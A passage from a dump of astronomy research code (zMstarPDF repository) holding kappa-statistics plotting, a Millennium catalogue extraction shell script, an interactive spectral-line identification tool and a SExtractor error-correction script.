root,dtype=['S1000','f8','f8','f8','f8'])\n\nkappastat = np.array([])\nfor i in range(np.shape(data)[0]):\n if i == 0:\n kappastat = np.array([data[i][1],data[i][2],data[i][3],data[i][4]])\n else:\n x = np.array([data[i][1],data[i][2],data[i][3],data[i][4]])\n kappastat = np.c_[kappastat,x]\n\nkappastat_120 = np.c_[kappastat[:,22-1], # 1-1/r\n kappastat[:,17-1], # z\n kappastat[:,14-1], # M_\\star\n kappastat[:,6-1], # M^2_\\star\n kappastat[:,10-1], # M^3_\\star$\n kappastat[:,19-1], # 1/r\n kappastat[:,18-1], # z/r\n kappastat[:,15-1], # M_\\star/r\n kappastat[:,7-1], # M^2_\\star/r\n kappastat[:,11-1], # M^3_\\star/r\n kappastat[:,9-1], # M^2_{\\star\\mathrm{rms}}\n kappastat[:,13-1], # M^3_{\\star\\mathrm{rms}}\n kappastat[:,8-1], # M^2_\\star/r_\\mathrm{,rms}\n kappastat[:,12-1], # M^3_\\star/r_\\mathrm{,rms}\n kappastat[:,5-1], # flexion\n kappastat[:,16-1], # tidal\n kappastat[:,3-1], # SIS\n kappastat[:,4-1]] # SIShalo\nkappastat_45 = np.c_[kappastat[:,25-1], # 1-1/r\n kappastat[:,47-1], # z\n kappastat[:,44-1], # M_\\star\n kappastat[:,36-1], # M^2_\\star\n kappastat[:,40-1], # M^3_\\star$\n kappastat[:,33-1], # 1/r\n kappastat[:,48-1], # z/r\n kappastat[:,45-1], # M_\\star/r\n kappastat[:,37-1], # M^2_\\star/r\n kappastat[:,41-1], # M^3_\\star/r\n kappastat[:,39-1], # M^2_{\\star\\mathrm{rms}}\n kappastat[:,43-1], # M^3_{\\star\\mathrm{rms}}\n kappastat[:,38-1], # M^2_\\star/r_\\mathrm{,rms}\n kappastat[:,42-1], # M^3_\\star/r_\\mathrm{,rms}\n kappastat[:,35-1], # flexion\n kappastat[:,46-1], # tidal\n kappastat[:,34-1], # SIS\n kappastat[:,34-1]] # SIShalo\n\nN 
= 18\nind = 2.5 * np.arange(N) # the x locations for the groups\nwidth = 0.8 # the width of the bars\n\nax = plt.subplot(2,1,1)\n\ncol1 = (kappastat_45[0])\nrects1 = ax.bar(ind + width, col1, width, color='r')\ncol2 = (kappastat_120[0])\nrects2 = ax.bar(ind + 2*width, col2, width, color='b')\n\n#ax.set_ylim([0.00,0.05])\nax.set_ylim([-0.05,0.05])\nax.set_ylabel('median$_\\kappa$')\n#ax.set_ylabel('$\\mathrm{median}_{\\kappa_\\mathrm{med} - \\kappa_\\mathrm{true}}$')\nax.set_xticks(ind + 2*width)\nax.set_xticklabels(('$1-1/r$', '$z$', '$M_\\star$', '$M^2_\\star$', '$M^3_\\star$', '$1/r$', '$z/r$', '$M_\\star/r$', '$M^2_\\star/r$', '$M^3_\\star/r$', '$M^2_{\\star\\mathrm{rms}}$', '$M^3_{\\star\\mathrm{rms}}$', '$M^2_\\star/r_\\mathrm{,rms}$', '$M^3_\\star/r_\\mathrm{,rms}$', '$M_\\star/r^3$', '$M_\\star/r^2$', '$\\sqrt{M_\\star}/r$', '$\\sqrt{M_h}/r$'), fontsize=10, rotation='vertical')\n\nax = plt.subplot(2,1,2)\n\ncol3 = (kappastat_45[1])\nrects3 = ax.bar(ind + width, col3, width, color='r')\ncol4 = (kappastat_120[1])\nrects4 = ax.bar(ind + 2*width, col4, width, color='b')\n\nax.set_ylim([0,0.05])\nax.set_ylabel('$\\sigma_\\kappa$')\n#ax.set_ylabel('$\\sigma_{\\kappa_\\mathrm{med} - \\kappa_\\mathrm{true}}$')\nax.set_xticks(ind + width)\nax.set_xticklabels(('$1-1/r$', '$z$', '$M_\\star$', '$M^2_\\star$', '$M^3_\\star$', '$1/r$', '$z/r$', '$M_\\star/r$', '$M^2_\\star/r$', '$M^3_\\star/r$', '$M^2_{\\star\\mathrm{rms}}$', '$M^3_{\\star\\mathrm{rms}}$', '$M^2_\\star/r_\\mathrm{,rms}$', '$M^3_\\star/r_\\mathrm{,rms}$', '$M_\\star/r^3$', '$M_\\star/r^2$', '$\\sqrt{M_\\star}/r$', '$\\sqrt{M_h}/r$'), fontsize=10, rotation='vertical')\nax.legend((rects1[0], rects2[0]), ('45 22.5 gal+1/r+', '120 22.5 gal+1/r+'), bbox_to_anchor=(0.65, 1.4), fontsize=10)\n#ax.legend((rects1[0], rects2[0]), ('45 22.5 gal+1/r+$\\gamma$+', '120 22.5 gal+1/r+$\\gamma$+'), bbox_to_anchor=(0.3, 0.97), fontsize=10)\nplt.subplots_adjust(left=0.15, bottom=0.15, right=0.95, top=0.95, wspace=0.7, hspace=0.7)\nplt.savefig('%skappashistbar-separately45and120noshear.png' % root, dpi=250)\n\nplt.clf()\n" }, { "alpha_fraction": 0.7010309100151062, "alphanum_fraction": 0.8247422575950623, "avg_line_length": 96, "blob_id": "97c1076a69507a25597dea565fa310cc4023b083", "content_id": "c8b9c63bfa9da52bd16ba78f0f2c14781f0ad6f7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 776, "license_type": "no_license", "max_line_length": 96, "num_lines": 8, "path": "/python/scripts/NAOJ/script_extractMillennium3.sh", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "python extractMillennium_Henriques.py GGL_los_8_2_0_N_4096_ang_4_Henriques2014_galaxies_on_plane\npython extractMillennium_Henriques.py GGL_los_8_2_1_N_4096_ang_4_Henriques2014_galaxies_on_plane\npython extractMillennium_Henriques.py GGL_los_8_2_2_N_4096_ang_4_Henriques2014_galaxies_on_plane\npython extractMillennium_Henriques.py GGL_los_8_2_3_N_4096_ang_4_Henriques2014_galaxies_on_plane\npython extractMillennium_Henriques.py GGL_los_8_2_4_N_4096_ang_4_Henriques2014_galaxies_on_plane\npython extractMillennium_Henriques.py GGL_los_8_2_5_N_4096_ang_4_Henriques2014_galaxies_on_plane\npython extractMillennium_Henriques.py GGL_los_8_2_6_N_4096_ang_4_Henriques2014_galaxies_on_plane\npython extractMillennium_Henriques.py GGL_los_8_2_7_N_4096_ang_4_Henriques2014_galaxies_on_plane\n" }, { "alpha_fraction": 0.5272626876831055, "alphanum_fraction": 0.5335593819618225, "avg_line_length": 33.489261627197266, "blob_id": 
"f90e390ae421b0513792d1867d26a25df00c3d1c", "content_id": "8974b86f9cbcea20a384a0c26852e909abd030f0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 14452, "license_type": "no_license", "max_line_length": 78, "num_lines": 419, "path": "/python/learn/id_spec.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "\nimport scipy,pickle,numpy\nimport numpy as np\ntry:\n import matplotlib.pyplot as plt\nexcept:\n import pylab as plt\nimport special_functions as sf\nfrom scipy import ndimage\nfrom mostools import specfit as spf\nSTANDARD = None\n\nclass IDSpectrum:\n \"\"\"\n IDSpectrum class for identification of spectral lines starting with an\n initial model of the spectrum.\n \"\"\"\n def __init__(self, arc,sky,wave,standardlines):\n \"\"\" Plot data \"\"\"\n self.arc = plt.plot(wave,arc,c='b')[0]\n self.sky = plt.plot(wave,sky,c='g')[0]\n self.canvas = self.arc.get_figure().canvas\n self.ax = self.arc._axes\n self.xdata = self.arc.get_xdata().copy()\n self.start = [arc.copy(),sky.copy(),wave.copy(),standardlines.copy()]\n\n self.standard = standardlines\n\n \"\"\" Get metadata (ie line locations) for arcs \"\"\"\n arc = self.arc.get_ydata()\n self.arcpeaks = ndimage.maximum_filter(arc,9)\n tmp = scipy.sort(arc)\n thresh = tmp[int(tmp.size*0.95)]\n cond = (arc==self.arcpeaks)&(arc>thresh)\n self.arcpeaks = scipy.where(cond)[0]\n #tmpX = numpy.arange(arc.size)*1.\n #self.arcpeaks = spf.get_lines(tmpX,arc)\n self.arcsel = self.arcpeaks*0\n self.arclines = []\n for peak in self.arcpeaks:\n l = plt.axvline(self.xdata[peak],c='k')\n self.arclines.append(l)\n\n sky = self.sky.get_ydata().copy()\n bg = ndimage.percentile_filter(sky,25,51)\n self.skypeaks = ndimage.maximum_filter(sky,9)\n tmp = scipy.sort(sky)\n thresh = tmp[int(tmp.size*0.99)]\n cond = (sky==self.skypeaks)&(sky>thresh)\n self.skypeaks = scipy.where(cond)[0]\n self.skysel = self.skypeaks*0\n self.skylines = []\n for peak in self.skypeaks:\n l = plt.axvline(self.xdata[peak],c='k',ls=':')\n self.skylines.append(l)\n\n self.spec = self.arc\n self.peaks = self.arcpeaks\n self.selected = self.arcsel\n self.lines = self.arclines\n\n \"\"\" Set useful flags \"\"\"\n self.domotion = False\n self.origx = None\n self.soln = None\n self.pick = False\n self.fitlines = None\n self.keyid = self.canvas.mpl_connect('key_press_event',self.key_press)\n\n self.connect()\n\n print \"\"\"\nMouse Controls:\n - left button drags single lines (rescales spectrum!)\n - middle button drags all lines (or exits from pan/zoom modes)\n - right button selects/deselects lines\nKeyboard Commands:\n g - add new line (use mouse to select the line)\n m - fit a polynomial solution to the ID'd lines\n w - write the current state to disk\n r - read a saved state\n n - reset to the initial state\n\"\"\"\n plt.show()\n\n def connect(self):\n \"\"\" Connect the mouse to the plot \"\"\"\n self.pressid = self.canvas.mpl_connect('button_press_event',\n self.on_press)\n self.moveid = self.canvas.mpl_connect('motion_notify_event',\n self.on_motion)\n self.offid = self.canvas.mpl_connect('button_release_event',\n self.on_release)\n\n def on_press(self,event):\n \"\"\"\n Deal with mouse button presses, including stretching, shifting,\n and line identification.\n \"\"\"\n \"\"\" Turn off plot tools \"\"\"\n if self.canvas.toolbar.mode!='':\n if event.button==2:\n self.canvas.toolbar.zoom()\n self.canvas.toolbar.pan()\n self.canvas.toolbar.pan()\n return\n\n self.xdata = self.spec.get_xdata().copy()\n if 
event.xdata==None or event.ydata==None: # Not in axes\n return\n\n ind = abs(self.xdata-event.xdata).argmin()\n indx = abs(self.peaks-ind).argmin()\n\n if abs(self.peaks-ind).min()>4.: # Not near any peaks\n return\n\n \"\"\" Select/unselect lines \"\"\"\n if event.button==3:\n if self.selected[indx]==1:\n self.selected[indx] = 0\n self.lines[indx].set_color('k')\n else:\n self.selected[indx] = 1\n self.lines[indx].set_color('r')\n plt.draw()\n return\n\n\n self.origx = self.xdata[self.peaks[indx]]\n self.lbound = self.xdata[0]\n self.lindx = 0\n for i in range(indx):\n if self.xdata[self.peaks[i]]>self.origx:\n break\n if self.selected[i]==1:\n self.lbound = self.xdata[self.peaks[i]]\n self.lindx = self.peaks[i]\n\n self.rbound = self.xdata[-1]\n self.rindx = -1\n for i in range(indx+1,self.peaks.size):\n if self.xdata[self.peaks[i]]<self.origx:\n continue\n if self.selected[i]==1:\n self.rbound = self.xdata[self.peaks[i]]\n self.rindx = self.peaks[i]\n break\n self.selected[indx] = 1\n self.indx = self.peaks[indx]\n self.domotion = True\n self.lines[indx].set_color('r')\n self.pick = False\n\n def on_motion(self, event):\n \"\"\" Controls the sliding/stretching of the spectra \"\"\"\n\n \"\"\"\n Ignore this if we aren't in slide/stretch mode (ie pressing the\n mouse button\n \"\"\"\n if self.domotion is False:\n return\n\n xdata = self.xdata.copy()\n \"\"\" Left mouse button is for stretching \"\"\"\n if event.button==1 and (event.xdata is not None) \\\n and (event.ydata is not None) and event.xdata>self.lbound \\\n and event.xdata<self.rbound:\n leftpts = self.xdata[self.lindx+1:self.indx+1].copy()\n left = scipy.linspace(leftpts[0],event.xdata,leftpts.size)\n rightpts = self.xdata[self.indx:self.rindx].copy()\n right = scipy.linspace(event.xdata,rightpts[-1],rightpts.size)[1:]\n xd = scipy.concatenate((left,right))\n xdata[self.lindx+1:self.rindx] = xd.copy()\n self.arc.set_xdata(xdata)\n self.sky.set_xdata(xdata)\n \"\"\" Middle mouse button is for sliding \"\"\"\n if event.button==2:\n offset = event.xdata-self.origx\n xdata = xdata + offset\n self.arc.set_xdata(xdata)\n self.sky.set_xdata(xdata)\n for i in range(self.arcpeaks.size):\n x = xdata[self.arcpeaks[i]]\n l = self.arclines[i]\n l.set_xdata([x,x])\n for i in range(self.skypeaks.size):\n x = xdata[self.skypeaks[i]]\n l = self.skylines[i]\n l.set_xdata([x,x])\n plt.draw()\n\n def on_release(self, event):\n \"\"\" If the mouse button is released, reset! 
\"\"\"\n if self.domotion:\n self.domotion = False\n self.xdata = self.spec.get_xdata().copy()\n plt.draw()\n\n def key_press(self,event):\n \"\"\"\n m is for fitting, p is for selecting new lines (or leaving select\n mode)\n \"\"\"\n if event.key.lower()=='m':\n self.do_fit()\n elif event.key.lower()=='a':\n if self.pick:\n self.pick = False\n self.canvas.mpl_disconnect(self.addid)\n self.connect()\n self.pick = False\n else:\n self.pick = True\n self.disconnect()\n print \"Choose the line to add (a to exit)\"\n self.addid = self.canvas.mpl_connect('button_press_event',\n self.add_line)\n elif event.key.lower()=='w':\n self.write()\n elif event.key.lower()=='r':\n self.read()\n elif event.key.lower()=='n':\n self.arc.remove()\n self.sky.remove()\n for i in self.lines:\n i.remove()\n a,b,c,d = self.start\n self.disconnect()\n self.canvas.mpl_disconnect(self.keyid)\n self.__init__(a,b,c,d)\n plt.draw()\n\n def do_fit(self):\n xdata = self.spec.get_xdata()\n ydata = self.arc.get_ydata()\n STANDARD = self.standard\n\n \"\"\" Get the centroided peaks of the selected lines \"\"\"\n print \"Finding line centroids...\"\n nlines = self.arcsel[self.arcsel==1].size\n fit = scipy.zeros(nlines*3+1)\n for i in range(nlines):\n fit[i*3+1] = ydata[self.arcpeaks[self.arcsel==1][i]]\n fit[i*3+2] = float(self.arcpeaks[self.arcsel==1][i])\n fit[i*3+3] = 1.\n ofit,chi = sf.ngaussfit(ydata,fit)\n xpeaks = []\n wpeaks = []\n x = xdata[self.arcpeaks[self.arcsel==1]]\n for i in range(nlines):\n if abs(fit[i*3+2]-ofit[i*3+2])>2.5:\n continue\n diff = abs(STANDARD-x[i])\n if diff.min()<5.:\n xpeaks.append(ofit[i*3+2])\n wpeaks.append(STANDARD[diff.argmin()])\n\n fitdata = scipy.empty((len(xpeaks),2))\n fitdata[:,0] = scipy.asarray(xpeaks)\n fitdata[:,1] = scipy.asarray(wpeaks)\n self.fitlines = fitdata[:,1].copy()\n ord = int(raw_input('Enter order of fit: '))\n fit = sf.lsqfit(fitdata,'polynomial',ord)\n self.soln = fit\n xdata = sf.genfunc(scipy.arange(xdata.size),0.,fit)\n self.sky.set_xdata(xdata)\n self.arc.set_xdata(xdata)\n for i in range(self.arcpeaks.size):\n x = xdata[self.arcpeaks[i]]\n l = self.arclines[i]\n l.set_xdata([x,x])\n for i in range(self.skypeaks.size):\n x = xdata[self.skypeaks[i]]\n l = self.skylines[i]\n l.set_xdata([x,x])\n plt.draw()\n def add_line(self,event):\n if self.canvas.toolbar.mode!='':\n if event.button==2:\n self.canvas.toolbar.zoom()\n self.canvas.toolbar.pan()\n self.canvas.toolbar.pan()\n return\n if event.xdata==None or event.ydata==None:\n print 'Invalid data'\n return\n xpos = event.xdata\n xdata = self.spec.get_xdata()\n ydata = self.spec.get_ydata()\n p = ndimage.maximum_filter(ydata,9)\n ind = abs(xdata-xpos).argmin()\n p = scipy.where((p==ydata))[0]\n if abs(p-ind).min()>5:\n print 'Not a line'\n return\n indx = p[abs(p-ind).argmin()]\n for i in self.peaks:\n if abs(indx-i)<9:\n print 'Too close to another line.'\n return\n if indx<5. 
or indx>xdata.size-6:\n print 'Too close to edge.'\n return\n peaks = scipy.arange(self.peaks.size+1)\n n = self.peaks[self.peaks<indx].size\n peaks[:n] = self.peaks[:n].copy()\n peaks[n] = indx\n peaks[n+1:] = self.peaks[n:].copy()\n sel = scipy.arange(peaks.size)\n sel[:n] = self.selected[:n].copy()\n sel[n] = 0\n sel[n+1:] = self.selected[n:].copy()\n self.peaks = peaks.copy()\n self.selected = sel.copy()\n xlim = self.ax.get_xlim()\n ylim = self.ax.get_ylim()\n if self.spec==self.arc:\n l = plt.axvline(xdata[indx],c='k')\n self.lines.insert(n,l)\n self.arcpeaks = self.peaks\n self.arcsel = self.selected\n self.arclines = self.lines\n else:\n l = plt.axvline(xdata[indx],c='k',ls=':')\n self.lines.insert(n,l)\n self.skypeaks = self.peaks\n self.skysel = self.selected\n self.skylines = self.lines\n self.ax.set_xlim(xlim)\n self.ax.set_ylim(ylim)\n plt.draw()\n self.canvas.mpl_disconnect(self.addid)\n self.connect()\n self.pick = False\n def disconnect(self):\n self.canvas.mpl_disconnect(self.pressid)\n self.canvas.mpl_disconnect(self.moveid)\n self.canvas.mpl_disconnect(self.offid)\n def write(self):\n oname = raw_input('Name of output file: ')\n f = open(oname,'w')\n xdata = self.spec.get_xdata()\n selected = self.arcsel\n peaks = self.arcpeaks\n soln = self.soln\n pickle.dump([xdata,selected,peaks,soln],f)\n f.close()\n print \"Writing Complete\"\n def read(self):\n oname = raw_input('Name of input file: ')\n try:\n f = open(oname,'r')\n xdata,selected,peaks,soln = pickle.load(f)\n f.close()\n except:\n print \"Could not read file: %s\"%oname\n return\n self.arc.set_xdata(xdata)\n self.arcpeaks = peaks\n self.arcsel = selected\n self.soln = soln\n for i in self.lines:\n i.remove()\n for i in range(len(self.lines)):\n del self.lines[0]\n for i in range(len(peaks)):\n c = 'k'\n if selected[i]==1:\n c = 'r'\n l = plt.axvline(xdata[peaks[i]],c=c)\n self.arclines.append(l)\n self.lines = self.arclines\n self.peaks = self.arcpeaks\n self.selected = self.arcsel\n plt.draw()\n\n\n\ndef id_spec(spec,model):\n import numpy\n fig = plt.figure()\n ax = fig.add_subplot(111)\n ax.fmt_xdata = plt.FormatStrFormatter('%4.2f')\n ax.fmt_ydata = plt.FormatStrFormatter('%4.2f')\n from scipy import ndimage,interpolate\n\n STANDARD = model['lines']\n arcmodel = model['matched']\n arc = spec.copy()\n blue,red,scale = model['blue'],model['red'],model['scale']\n while (red-blue)/scale<arc.size:\n red += scale\n blue -= scale\n wave = numpy.arange(blue,red,scale)\n blue,red = model['blue'],model['red']\n model = interpolate.splev(wave,arcmodel)\n c = (wave<blue)|(wave>red)\n model[c] = model[~c].min()\n sci = arc*0.\n\n model /= model.max()/arc[numpy.isfinite(arc)].max()\n plt.plot(wave,model,c='gray')\n\n lines = []\n\n dr = IDSpectrum(arc,sci,wave[:arc.size],STANDARD)\n\n if dr.soln is None:\n dr.do_fit()\n xdata = dr.arc.get_xdata()\n ydata = dr.arc.get_ydata()\n wave = sf.genfunc(numpy.arange(xdata.size),0.,dr.soln)\n wide = ndimage.gaussian_filter(ydata,3.)\n match = interpolate.splrep(wave,ydata)\n wide = interpolate.splrep(wave,wide)\n model = {'wide':wide,'matched':match,'orig':[wave,ydata],\n 'lines':dr.fitlines,'red':red,'blue':blue,'scale':scale}\n return model,dr.soln\n" }, { "alpha_fraction": 0.6482310891151428, "alphanum_fraction": 0.6776670813560486, "avg_line_length": 43.831966400146484, "blob_id": "edacd1a104b8412e31d7b7a21bf9a39289549eba", "content_id": "9063cd326d4fdec7a61ad04491f2a4a8ab79fa79", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", 
"length_bytes": 10939, "license_type": "no_license", "max_line_length": 284, "num_lines": 244, "path": "/python/catalogue_utilities/sexerrors.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "##########################\n# The code finds more realistic error bars for the magnitudes in a catalogue produced with Sextractor\n# It does this by finding a beter estimate of the background variance, which accounts for pixel correlations\n# The empirical method is based on Liu et al. 2016 (arXiv:1612.01101v1) and references within\n##########################\n\n# IF THE CODE FAILS WITH ERROR \"ValueError: zero-size array to reduction operation maximum which has no identity\", EITHER RUN REPEATEDLY UNTIL IT WORKS, OR REDUCE THE VALUE OF success\n\n# VERY IMPORTANT TO REMEMBER THAT IN DUAL MODE SEXTRACTOR PRODUCES STD AND BACKGROUND MAPS ONLY FOR THE DETECTION IMAGE, SO I FIRST NEED TO RUN SEXTRACTOR IN SINGLE IMAGE MODE AND SAVE THOSE STD AND BACKGROUND MAPS INSTEAD. ALSO, SEXTRACTOR NEEDS TO BE RUN WITH A CUSTOM DEFAULT.PARAM\n\nimport numpy as np\nimport pylab as plt\nfrom astropy.io import fits\nfrom scipy.optimize import leastsq\n\n#image = \"FINALweighted_r_covernolens.fits\"\n#wht = \"FINALweighted_r_covernolens_matchg_wht.fits\"\n#segmentation = \"r_noconv_segm.fits\"\n#back = fits.open(\"r_noconv_backUSE.fits\")[0].data\n#std_im = fits.open(\"r_noconv_stdUSE.fits\")[0].data\n#savecat = \"r_detectin_ir_noconv_newisoerror.cat\"\n#xpos,ypos,F,err,area = np.loadtxt(\"r_detectin_ir_noconv.cat\",usecols=[0,1,10,15,9],unpack=True)\n\n#image = \"FINALweighted_i_covernolens.fits\"\n#wht = \"FINALweighted_i_covernolens_matchg_wht.fits\"\n#segmentation = \"i_noconv_segm_detect_i.fits\"\n#back = fits.open(\"i_noconv_backUSE_detect_i.fits\")[0].data\n#std_im = fits.open(\"i_noconv_stdUSE_detect_i.fits\")[0].data\n#savecat = \"i_detectin_i_noconv_newisoerr.cat\"\n#xpos,ypos,F,err,area = np.loadtxt(\"i_detectin_i_noconv.cat\",usecols=[0,1,10,15,9],unpack=True)\n\nimage = \"FINALweighted_i_covernolens.fits\"\nwht = \"FINALweighted_i_covernolens_matchg_wht.fits\"\nsegmentation = \"i_noconv_segm_detect_ir.fits\"\nback = fits.open(\"i_noconv_backUSE_detect_i.fits\")[0].data\nstd_im = fits.open(\"i_noconv_stdUSE_detect_i.fits\")[0].data\nsavecat = \"i_detectin_ir_noconv_newisoerr.cat\"\nxpos,ypos,F,err,area = np.loadtxt(\"i_detectin_ir_noconv.cat\",usecols=[0,1,10,15,9],unpack=True)\n\n#image = \"FINALweighted_u_covernolens_matchg_bkgsubt.fits\"\n#wht = \"FINALweighted_u_covernolens_matchg_wht.fits\"\n#segmentation = \"u_segm.fits\"\n#back = fits.open(\"u_backUSE.fits\")[0].data\n#std_im = fits.open(\"u_stdUSE.fits\")[0].data\n#savecat = \"u_detectin_ir_newisoerror.cat\"\n#xpos,ypos,F,err,area = np.loadtxt(\"u_detectin_ir.cat\",usecols=[0,1,10,15,9],unpack=True)\n\n#image = \"FINALweighted_g_covernolens.fits\"\n#wht = \"FINALweighted_g_covernolens_wht.fits\"\n#segmentation = \"g_segm.fits\"\n#back = fits.open(\"g_backUSE.fits\")[0].data\n#std_im = fits.open(\"g_stdUSE.fits\")[0].data\n#savecat = \"g_detectin_ir_newisoerror.cat\"\n#xpos,ypos,F,err,area = np.loadtxt(\"g_detectin_ir.cat\",usecols=[0,1,10,15,9],unpack=True)\n\n#image = \"FINALweighted_r_covernolens_matchg.fits\"\n#wht = \"FINALweighted_r_covernolens_matchg_wht.fits\"\n#segmentation = \"r_segm.fits\"\n#back = fits.open(\"r_backUSE.fits\")[0].data\n#std_im = fits.open(\"r_stdUSE.fits\")[0].data\n#savecat = \"r_detectin_ir_newisoerror.cat\"\n#xpos,ypos,F,err,area = 
np.loadtxt(\"r_detectin_ir.cat\",usecols=[0,1,10,15,9],unpack=True)\n\n#image = \"FINALweighted_i_covernolens_matchg.fits\"\n#wht = \"FINALweighted_i_covernolens_matchg_wht.fits\"\n#segmentation = \"i_segm.fits\"\n#back = fits.open(\"i_backUSE.fits\")[0].data\n#std_im = fits.open(\"i_stdUSE.fits\")[0].data\n#savecat = \"i_detectin_ir_newisoerror.cat\"\n#xpos,ypos,F,err,area = np.loadtxt(\"i_detectin_ir.cat\",usecols=[0,1,10,15,9],unpack=True)\n\n#image = \"FINALweighted_z_covernolens_matchg.fits\"\n#wht = \"FINALweighted_z_covernolens_matchg_wht.fits\"\n#segmentation = \"z_segm.fits\"\n#back = fits.open(\"z_backUSE.fits\")[0].data\n#std_im = fits.open(\"z_stdUSE.fits\")[0].data\n#savecat = \"z_detectin_ir_newisoerror.cat\"\n#xpos,ypos,F,err,area = np.loadtxt(\"z_detectin_ir.cat\",usecols=[0,1,10,15,9],unpack=True)\n\n#image = \"FINALweighted_Y_covernolens_matchg.fits\"\n#wht = \"FINALweighted_Y_covernolens_matchg_wht.fits\"\n#segmentation = \"Y_segm.fits\"\n#back = fits.open(\"Y_backUSE.fits\")[0].data\n#std_im = fits.open(\"Y_stdUSE.fits\")[0].data\n#savecat = \"Y_detectin_ir_newisoerror.cat\"\n#xpos,ypos,F,err,area = np.loadtxt(\"Y_detectin_ir.cat\",usecols=[0,1,10,15,9],unpack=True)\n\n#image = \"FINALHEADmedian_J_covernolens_matchg_bkgsubt.fits\"\n#wht = \"FINALweighted_J_covernolens_matchg_wht.fits\"\n#segmentation = \"J_segm.fits\"\n#back = fits.open(\"J_backUSE.fits\")[0].data\n#std_im = fits.open(\"J_stdUSE.fits\")[0].data\n#savecat = \"J_detectin_ir_newisoerror.cat\"\n#xpos,ypos,F,err,area = np.loadtxt(\"J_detectin_ir.cat\",usecols=[0,1,10,15,9],unpack=True)\n\n#image = \"FINALHEADmedian_H_covernolens_matchg_bkgsubt.fits\"\n#wht = \"FINALweighted_H_covernolens_matchg_wht.fits\"\n#segmentation = \"H_segm.fits\"\n#back = fits.open(\"H_backUSE.fits\")[0].data\n#std_im = fits.open(\"H_stdUSE.fits\")[0].data\n#savecat = \"H_detectin_ir_newisoerror.cat\"\n#xpos,ypos,F,err,area = np.loadtxt(\"H_detectin_ir.cat\",usecols=[0,1,10,15,9],unpack=True)\n\n#image = \"FINALHEADmedian_Ks_covernolens_matchg_bkgsubt.fits\"\n#wht = \"FINALweighted_Ks_covernolens_matchg_wht.fits\"\n#segmentation = \"Ks_segm.fits\"\n#back = fits.open(\"Ks_backUSE.fits\")[0].data\n#std_im = fits.open(\"Ks_stdUSE.fits\")[0].data\n#savecat = \"Ks_detectin_ir_newisoerror.cat\"\n#xpos,ypos,F,err,area = np.loadtxt(\"Ks_detectin_ir.cat\",usecols=[0,1,10,15,9],unpack=True)\n\n\n\nimg = fits.open(image)[0].data\ngain = fits.open(image)[0].header['gain']\nsegm = fits.open(segmentation)[0].data\naper_img = fits.open(segmentation) # will be used to register the apertures\nmed_std = np.median(std_im) # median value of the std computed by Sextractor across the image\naper = aper_img[0].data\nweight = fits.open(wht)[0].data\nNmax = 20\napertures_nr = 300\ngauss = np.zeros([Nmax,3]) # scale, mean and std for the fitted gaussians for N in range (1,20+1)\nplt.clf()\n\nfor N in range(1,Nmax+1): # sqrt(Npix)\n i = 1 # aperture number, including bad apertures\n success = 0 # number of successful apertures\n aper[aper != 0] = 0 # initialize with no apertures\n flux = np.array([]) # the flux measured in each aperture\n while i <= 3000 and success < apertures_nr:\n ok = True\n xcenter,ycenter = np.random.randint(low=0, high=img.shape[0], size=2)\n xlow = int(xcenter - N/2.0)\n xhigh = int(xcenter + N/2.0)\n ylow = int(ycenter - N/2.0)\n yhigh = int(ycenter + N/2.0)\n # for simplicity, make all apertures squares\n # do not use the aperture if it is not contained inside the image borders, or if it corresponds to non-zero segmentation map 
values, or if it overlaps with a previous aperture, or if it falls in a region with zero weight\n if xlow < 0 or ylow < 0 or xhigh > img.shape[0] or yhigh > img.shape[0] or np.max(segm[xlow:xhigh,ylow:yhigh] > 0) == True or np.max(aper[xlow:xhigh,ylow:yhigh] > 0) == True or np.max(weight[xlow:xhigh,ylow:yhigh] == 0) == True:\n ok = False\n if ok == True:\n aper[xlow:xhigh,ylow:yhigh] = 1\n # here I account for the fact that the noise is not uniform across the image, and I read it from the Sextractor noise map\n scaledflux = np.sum(img[xlow:xhigh,ylow:yhigh] - back[xlow:xhigh,ylow:yhigh]) * std_im[xcenter][ycenter] / med_std\n flux = np.append(flux,np.array(scaledflux))\n success += 1\n i += 1\n # fitting gaussian to the data\n fitfunc = lambda p, x: p[0]*np.exp(-0.5*((x-p[1])/p[2])**2)\n errfunc = lambda p, x, y: (y - fitfunc(p, x))\n init = [100.0, -1, 5]\n ydata,xdatabin = np.histogram(flux)\n bin = xdatabin[1]-xdatabin[0]\n xdata = np.linspace(xdatabin[0]+bin/2.0,xdatabin[len(xdatabin)-1]-bin/2.0,len(xdatabin)-1)\n out = leastsq( errfunc, init, args=(xdata, ydata))\n c = out[0]\n c[2] = np.abs(c[2]) # because by definition, c[2] may be negative\n gauss[N - 1] = c\n #plt.plot(xdata, fitfunc(c, xdata))\n #plt.hist(flux)\n #plt.title(r'$N = %.0f\\ A = %.3f\\ \\mu = %.3f\\ \\sigma = %.3f\\ $' %(N,c[0],c[1],c[2]));\n #plt.show()\n#aper_img.writeto(\"check_aper.fits\",clobber=True)\n\n# fitting the power law\nstd_0 = gauss[0][2]\nfitfunc = lambda p, x: std_0 * (x ** p[0])\nerrfunc = lambda p, x, y: (y - fitfunc(p, x))\ninit = [1.5]\nydata,xdata = gauss[:,2], range(1,Nmax+1)\nout = leastsq( errfunc, init, args=(xdata, ydata))\nc = out[0]\nplt.yscale('log')\nplt.plot(xdata, fitfunc(c, xdata))\nplt.plot(xdata, fitfunc(np.array([1]), xdata),'r--')\nplt.plot(xdata, fitfunc(np.array([2]), xdata),'r--')\nplt.scatter(xdata,ydata)\nplt.xlabel('N')\nplt.ylabel('$\\sigma$ [counts/s]')\nplt.xlim(0,Nmax + 1)\nplt.title(r'$\\sigma = %.3f\\ \\beta = %.3f\\ $' %(std_0,c[0]))\nplt.show()\n\n# correct the errors\nstd = np.zeros(len(xpos))\nerr_recover = np.zeros(len(xpos))\nerr_new = np.zeros(len(xpos))\nfor i in range(len(xpos)):\n std[i] = std_im[int(ypos[i])][int(xpos[i])] # switched xpos and ypos because this is how fits images are read to the array\n err_recover[i] = 1.0857 * np.sqrt(area[i] * (std[i] ** 2) + F[i]/gain) / F[i]\n err_new[i] = 1.0857 * np.sqrt((std[i] ** 2) * (area[i] ** c[0]) + F[i]/gain) / 